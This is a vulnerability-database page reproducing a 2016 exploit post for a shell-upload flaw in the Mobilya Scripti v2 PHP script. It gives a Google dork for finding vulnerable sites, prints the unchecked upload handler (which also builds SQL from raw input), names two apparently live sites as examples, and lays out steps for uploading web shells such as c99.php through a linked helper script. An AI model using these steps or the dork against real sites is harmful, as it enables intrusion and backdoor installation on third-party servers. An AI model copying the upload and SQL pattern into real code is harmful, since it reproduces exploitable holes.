Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mobilya Scripti 2 Shell Upload

🗓️ 11 Apr 2016 00:00:00Reported by AntidoteType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Mobilya Scripti v2 Shell Upload vulnerability on insan_kaynaklari_gonder.ph

Code
` 1. # Exploit Title: Mobilya Scripti v2 File Upload  
2. # Google Dork: intext:Lütfen sadece .doc yada .pdf uzantılı dosya  
gönderin.  
3. # Date: 10.4.2016  
4. # Exploit Author: Antidote([email protected])  
5. # Vendor Homepage:  
http://www.hazirscriptler.web.tr/mobilya-scripti-php-v2  
6. # Version: v2  
7. # Tested on: Windows  
8. ------------------------------------------------  
9. __ .__ .___ __  
10. _____ _____/ |_|__| __| _/_____/ |_ ____  
11. \__ \ / \ __\ |/ __ |/ _ \ __\/ __ \  
12. / __ \| | \ | | / /_/ ( <_> ) | \ ___/  
13. (____ /___| /__| |__\____ |\____/|__| \___ >  
14. \/ \/ \/ \/  
15. ------------------------------------------------  
16. Script Bug File:insan_kaynaklari_gonder.php  
17. ------------------------------------------------  
18. $eposta = p('txt_email');  
19. $tarih = date("d-m-Y");  
20. $kaynak = $_FILES["txt_dosya"]["tmp_name"];  
21. $dosya = $_FILES["txt_dosya"]["name"];  
22. $uzanti = explode(".", $_FILES[txt_dosya][name]);  
23. $random = rand(0,9999);  
24. $yeni_isim = $random."_".$dosya;  
25. $hedef = "kit/cv/".$yeni_isim;  
26.  
27. if($dosya=="")  
28. {  
29. echo 'Lutfen cv yükleyiniz....';  
30. echo '<meta http-equiv="refresh" content="2;  
url=sayfa-insan-kaynaklari" />';  
31. }  
32.  
33. else{  
34. $gitti=move_uploaded_file($kaynak,$hedef);  
35. $iletisim_ekle_sorgu=mysql_query("insert into insan_kaynaklari (  
36.  
eposta,  
37.  
dosya,  
38.  
tarih)  
39.  
values (  
40.  
'$eposta',  
41.  
'$yeni_isim',  
42.  
'$tarih')");  
43. echo 'Başvurunuz başarıyla alınmıştır. Değerlendirilip dönüş  
yapılacaktır.. Yonlendiriliyorsunuz...';  
44. echo '<meta http-equiv="refresh" content="2;  
url=sayfa-insan-kaynaklari" />';  
45. }  
46. }  
47.  
---------------------------------------------------------------------------------  
48. Example:http://nehircollection.com/sayfa-insan-kaynaklari ,  
http://www.saralphotography.com/sayfa-insan-kaynaklari  
49. Enter mail and File Shell send after  
50. Open on localhost php file =>  
https://gist.github.com/anonymous/a30506e46d6edc724bb373744d25cd8c  
51. after  
52. Url:http://example.com  
53. Shellname: send shell name (Ex:c99.php,a.php,c.php)  
54. Submit  
55. Wait till the end  
56. include shell page url :)  
57.  
---------------------------------------------------------------------------------  
58. Team : Janissaries.org, Spycod3.org  
59. Thanks : Bydokunulmaz  
60. Twitter: @coderantidote  
61. Website: antidotesoft.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Apr 2016 00:00Current
7.4High risk
Vulners AI Score7.4
file uploadscript bugdata tamperingvendor vulnerabilityshell upload
30